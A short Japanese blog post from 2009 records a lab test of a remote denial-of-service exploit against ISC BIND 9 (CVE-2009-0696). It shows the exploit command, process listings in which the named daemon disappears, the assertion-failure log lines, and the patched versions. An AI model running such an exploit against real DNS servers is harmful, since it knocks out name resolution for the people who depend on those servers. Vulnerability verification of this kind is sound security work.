8月 3

ISC BIND 9 Dynamic Update Message Remote DoS

BIND 9に対してリモートからDoSをする攻撃コードの検証をしました。
利用する脆弱性はCVE-2009-0696です。

【exploit 実行】
./bind9_dum_dos 10.100.0.130 pentest.jp
【対象上での変化】
[root@victim ~]# ps ax|grep named
18958 ? Ssl 0:00 /usr/sbin/named -u named
19002 pts/2 S+ 0:00 grep named
[root@victim ~]# ps ax|grep named
[root@victim ~]#

1回のpsコマンドはexploit実行前。2回目はExploit実行後です。
プロセスがいなくなっていることが分かります。
また、エラーログには以下のような記述が書き出されていました。
Aug 3 13:40:32 victim named[19019]: db.c:579: REQUIRE(type != ((dns_rdatatype_t)dns_rdatatype_any)) failed
Aug 3 13:40:32 victim named[19019]: exiting (due to assertion failure)

現在のところ影響を受けないとされているバージョンは以下の3つだそうです。
ISC BIND 9.6.1 P3
ISC BIND 9.5.1 P3
ISC BIND 9.4.3 P3

2009/08/04追記:
影響を受けるバージョンとしてBIND9.3以前も影響を受けるようですがEOLなので修正版は提供されないようです。


Copyright 2021. All rights reserved.

Posted 2009年8月3日 by ntsuji in category "exploit